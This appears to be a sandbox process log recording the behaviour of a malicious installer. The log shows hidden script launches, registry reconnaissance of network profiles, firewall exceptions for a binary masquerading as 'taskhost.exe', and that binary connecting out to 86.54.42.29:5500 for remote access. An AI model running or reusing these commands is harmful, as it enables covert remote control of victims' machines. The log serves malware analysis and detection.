msiexec.exe "C:\Windows\System32\msiexec.exe" /I C:\Users\test22\AppData\Local\Temp\Software-MSI.msi
2592viewer.exe "C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd"
2916cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
2072cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
2116reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
152WMIC.exe wmic process where (name="taskhost.exe") get commandline
2228findstr.exe findstr /i "taskhost.exe"
2260chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://us1.discourse-cdn.com/flex019/uploads/manager1/original/2X/4/40a86b146f0d5eca2a51907256327ed2524cdf02.png
2612chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef425f1e8,0x7fef425f1f8,0x7fef425f208
2900chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2604 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
284viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
2776timeout.exe timeout /t 1
2876taskkill.exe taskkill /im rundll32.exe /f
2244timeout.exe timeout /t 2
2944taskkill.exe taskkill /im rundll32.exe /f
300timeout.exe timeout /t 2
1852taskkill.exe taskkill /im rundll32.exe /f
2792timeout.exe timeout /t 2
1864mode.com Mode 90,20
2084cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
2212cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
1528reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
2396cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
2184mode.com Mode 90,20
2848netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
3028netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
2392WMIC.exe wmic process where (name="taskhost.exe") get commandline
2756findstr.exe findstr /i "taskhost.exe"
2400taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5533368 -connect 86.54.42.29:5500 -run
2236viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
2268timeout.exe timeout /t 20
604timeout.exe timeout /t 20
3764timeout.exe timeout /t 20
3468timeout.exe timeout /t 20
3676cmd.exe cmd /c ""C:\Games\once.cmd" "
1976